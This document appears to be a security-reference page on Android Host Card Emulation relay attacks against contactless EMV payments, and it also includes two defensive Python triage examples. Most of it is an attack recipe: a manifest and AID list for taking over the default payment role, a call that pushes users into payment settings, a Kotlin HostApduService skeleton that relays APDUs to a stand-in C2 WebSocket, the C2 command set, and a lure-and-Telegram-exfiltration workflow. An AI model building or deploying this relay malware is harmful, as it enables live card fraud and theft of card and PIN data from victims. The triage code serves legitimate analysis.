Android HCE NFC/EMV Relay Attacks


Overview

Abuse of Android Host Card Emulation (HCE) lets a malicious app that has been set as the default NFC payment service relay EMV contactless transactions in real time. The POS terminal speaks ISO 14443-4/EMV to the phone; the app's HostApduService receives the APDUs and forwards them over a bidirectional C2 channel (often a WebSocket) to a backend that crafts the responses, which are then returned to the POS. This enables live card emulation without any card data stored on the device. Widely observed campaigns pose as banking/government apps, push the user to make them the default payment app, and auto-exfiltrate device/card data to Telegram bots/channels.

Key characteristics

  • Android components: HostApduService + default NFC payment handler (category "payment")
  • Transport/C2: WebSocket for APDU relay; Telegram bot API for exfil/ops
  • Operator workflow: structured commands (login, register_device, apdu_command/apdu_response, get_pin/pin_response, paired, check_status, update_required, telegram_notification, error)
  • Roles: scanner (read EMV data) vs tapper (HCE/relay) builds

Core implementation pieces

Manifest (become the default payment HCE service)

```xml
<uses-feature android:name="android.hardware.nfc.hce" android:required="true"/>
<uses-permission android:name="android.permission.NFC"/>

<application ...>
    <service
        android:name=".EmvRelayService"
        android:exported="true"
        android:permission="android.permission.BIND_NFC_SERVICE">
        <intent-filter>
            <action android:name="android.nfc.cardemulation.action.HOST_APDU_SERVICE"/>
        </intent-filter>
        <meta-data
            android:name="android.nfc.cardemulation.host_apdu_service"
            android:resource="@xml/aid_list"/>
    </service>
</application>
```

Example EMV payment-category AID list (only the app set as the default payment app can answer these AIDs):

```xml
<?xml version="1.0" encoding="utf-8"?>
<host-apdu-service xmlns:android="http://schemas.android.com/apk/res/android"
    android:description="@string/app_name"
    android:requireDeviceUnlock="false">
    <aid-group android:category="payment" android:description="@string/app_name">
        <!-- PPSE (2PAY.SYS.DDF01) routing -->
        <aid-filter android:name="325041592E5359532E4444463031"/>
        <!-- Common EMV AIDs (examples): -->
        <aid-filter android:name="A0000000031010"/> <!-- VISA credit/debit -->
        <aid-filter android:name="A0000000041010"/> <!-- MasterCard -->
        <aid-filter android:name="A00000002501"/>   <!-- AmEx -->
    </aid-group>
</host-apdu-service>
```
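For triage of a suspicious APK, the descriptor above is the first thing to read: a payment-category HCE service that routes the PPSE AID and does not require device unlock has exactly the shape this relay needs. The following added example (not from the page or any named project) parses a constructed `host_apdu_service` XML and reports those indicators; `triage_hce_descriptor` and `triage_findings` are names chosen here.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
PPSE_AID = "325041592E5359532E4444463031"  # hex of "2PAY.SYS.DDF01"

# Constructed sample descriptor shaped like the aid_list above (not from a real APK).
SAMPLE_AID_LIST = """<host-apdu-service xmlns:android="http://schemas.android.com/apk/res/android"
    android:description="@string/app_name"
    android:requireDeviceUnlock="false">
  <aid-group android:category="payment" android:description="@string/app_name">
    <aid-filter android:name="325041592E5359532E4444463031"/>
    <aid-filter android:name="A0000000031010"/>
    <aid-filter android:name="A0000000041010"/>
  </aid-group>
</host-apdu-service>"""


def _attr(el, name):
    """Read an android:-namespaced attribute (None when absent)."""
    return el.get("{%s}%s" % (ANDROID_NS, name))


def triage_hce_descriptor(xml_text: str) -> dict:
    """Summarise the payment-relevant settings of a host-apdu-service XML."""
    root = ET.fromstring(xml_text)
    groups = root.findall("aid-group")
    aids = [(_attr(f, "name") or "").upper()
            for g in groups for f in g.findall("aid-filter")]
    # Android defaults requireDeviceUnlock to true when the attribute is missing.
    unlock = (_attr(root, "requireDeviceUnlock") or "true").lower()
    return {
        "payment_category": any(_attr(g, "category") == "payment" for g in groups),
        "claims_ppse": PPSE_AID in aids,
        "no_unlock_required": unlock == "false",
        "aids": aids,
    }


def triage_findings(summary: dict) -> list:
    """Turn the summary into reviewer findings; an empty list means nothing notable."""
    findings = []
    if summary["payment_category"] and summary["claims_ppse"]:
        findings.append("payment-category HCE service that routes PPSE: can front EMV "
                        "transactions once the user sets it as default payment app")
    if summary["no_unlock_required"]:
        findings.append("requireDeviceUnlock=false: emulation answers while the phone is locked")
    return findings
```

Legitimate wallets declare the same category and AIDs, so the findings are a reason to inspect the service implementation and its network behaviour, not a verdict on their own.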

Prompt the user to choose the default payment app (opens the OS settings screen):

```kotlin
val intent = Intent("android.settings.NFC_PAYMENT_SETTINGS")
startActivity(intent)
```

HostApduService relay skeleton

```kotlin
import android.nfc.cardemulation.HostApduService
import android.os.Bundle

class EmvRelayService : HostApduService() {
    private var ws: okhttp3.WebSocket? = null

    override fun onCreate() {
        super.onCreate()
        // Establish the C2 WebSocket early; authenticate and register the device
        val client = okhttp3.OkHttpClient()
        val req = okhttp3.Request.Builder().url("wss://c2.example/ws").build()
        ws = client.newWebSocket(req, object : okhttp3.WebSocketListener() {})
    }

    // Called by the OS for every command APDU the POS sends to a routed AID
    override fun processCommandApdu(commandApdu: ByteArray?, extras: Bundle?): ByteArray {
        // Marshal the APDU to the C2 and block until the matching response arrives
        val id = System.nanoTime()
        val msg = mapOf(
            "type" to "apdu_command",
            "id" to id,
            "data" to commandApdu!!.toHex()
        )
        val response = sendAndAwait(msg) // wait for the matching apdu_response{id}
        return response.hexToBytes()
    }

    // Called when the NFC link is lost or the POS selects another AID
    override fun onDeactivated(reason: Int) {
        ws?.send("{\"type\":\"card_removed\"}")
    }

    private fun sendAndAwait(m: Any): String {
        // Implement correlation + timeout; handle error/blocked status
        // ...
        return "9000" // fall back to SW success if needed
    }
}

// Hex helpers assumed by the skeleton
private fun ByteArray.toHex(): String = joinToString("") { "%02X".format(it) }
private fun String.hexToBytes(): ByteArray = chunked(2).map { it.toInt(16).toByte() }.toByteArray()
```

Usage note: the background service must answer every APDU within the POS timeout budget (a few hundred milliseconds), so the socket must be low-latency and already authenticated to the C2. Where needed, survive process death by running as a foreground service.

Typical C2 command set (observed)

```text
login / login_response
register / register_device / register_response
logout
apdu_command / apdu_response
card_info / clear_card_info / card_removed
get_pin / pin_response
check_status / status_response
paired / unpaired
update_required
telegram_notification / telegram_response
error
```

EMV contactless exchange (basic walkthrough)

The POS drives the flow; the HCE app only passes the APDUs through:

  • SELECT PPSE (2PAY.SYS.DDF01)
    00 A4 04 00 0E 32 50 41 59 2E 53 59 53 2E 44 44 46 30 31 00
  • SELECT application AID (e.g., VISA A0000000031010)
    00 A4 04 00 len 00
  • GET PROCESSING OPTIONS (GPO)
    80 A8 00 00 Lc 00
  • READ RECORD(S) per AFL
    00 B2 <SFI/record> 0C 00
  • GENERATE AC (ARQC/TC)
    80 AE 80 00 Lc 00

In the relay, the backend crafts the correct FCI/FCP, AFL, records and cryptogram; the phone only passes bytes.
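When reviewing a capture of relayed `apdu_command` traffic, the first step is to map each hex string back onto the EMV step above. The added example below (not from the page or any named project) parses short-form ISO 7816-4 command APDUs and labels the commands in this flow, including the READ RECORD SFI/record split and the cryptogram type requested by GENERATE AC; the sample sequence and the function names are constructed here.

```python
from collections import namedtuple

# (CLA, INS) pairs of the commands in the contactless flow above.
EMV_COMMANDS = {
    (0x00, 0xA4): "SELECT",
    (0x80, 0xA8): "GET PROCESSING OPTIONS",
    (0x00, 0xB2): "READ RECORD",
    (0x80, 0xAE): "GENERATE AC",
}
PPSE_NAME = b"2PAY.SYS.DDF01"
Apdu = namedtuple("Apdu", "cla ins p1 p2 data le")   # le is None when absent

def parse_apdu(raw: bytes) -> Apdu:
    """Parse a short-form ISO 7816-4 command APDU (cases 1-4), rejecting bad length fields."""
    if len(raw) < 4:
        raise ValueError("APDU needs at least CLA INS P1 P2")
    cla, ins, p1, p2 = raw[:4]
    body = raw[4:]
    if len(body) <= 1:                        # case 1 (no body) or case 2 (Le only)
        return Apdu(cla, ins, p1, p2, b"", body[0] if body else None)
    lc, data, rest = body[0], body[1:1 + body[0]], body[1 + body[0]:]
    if len(data) != lc or len(rest) > 1:      # case 3 (Lc+data) or case 4 (Lc+data+Le)
        raise ValueError("Lc/Le do not match the APDU length")
    return Apdu(cla, ins, p1, p2, data, rest[0] if rest else None)

def describe(raw: bytes) -> str:
    """Label one relayed command in EMV terms, as an analyst reviewing a capture would."""
    a = parse_apdu(raw)
    name = EMV_COMMANDS.get((a.cla, a.ins), "UNKNOWN CLA/INS %02X%02X" % (a.cla, a.ins))
    if name == "SELECT":
        return "SELECT PPSE" if a.data == PPSE_NAME else "SELECT AID " + a.data.hex().upper()
    if name == "READ RECORD":                 # P2 = SFI << 3 | 0b100, P1 = record number
        return "READ RECORD sfi=%d rec=%d" % (a.p2 >> 3, a.p1)
    if name == "GENERATE AC":                 # P1 bits 8-7 select the cryptogram type
        kind = {0x00: "AAC", 0x40: "TC", 0x80: "ARQC"}.get(a.p1 & 0xC0, "RFU")
        return "GENERATE AC (%s requested)" % kind
    return name

# Constructed sample of the sequence a POS drives, as hex strings the relay would log.
SAMPLE_FLOW = [
    "00A404000E325041592E5359532E444446303100",   # SELECT PPSE
    "00A4040007A000000003101000",                 # SELECT VISA AID
    "80A8000002830000",                           # GPO with an empty PDOL
    "00B2010C00",                                 # READ RECORD SFI 1, record 1
    "80AE80001D" + "00" * 29 + "00",              # GENERATE AC, ARQC requested
]

def summarise_flow(hex_apdus) -> list:
    return [describe(bytes.fromhex(h)) for h in hex_apdus]
```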

Operator workflows observed in practice

  • Lure + install: the app disguises itself as a banking/government portal, shows a full-screen WebView and immediately asks to become the default NFC payment app.
  • Event-driven activation: an NFC tap starts the HostApduService; the relay begins.
  • Scanner/Tapper roles: one build reads EMV data from the victim's card (PAN, expiry, tracks, device/EMV fields) and exfiltrates it; another build (or the same device later) performs the HCE relay to the POS.
  • Exfiltration: device/card data is posted automatically to private Telegram channels/bots; the WebSocket drives sessions and UI prompts (e.g., an on-device PIN UI).
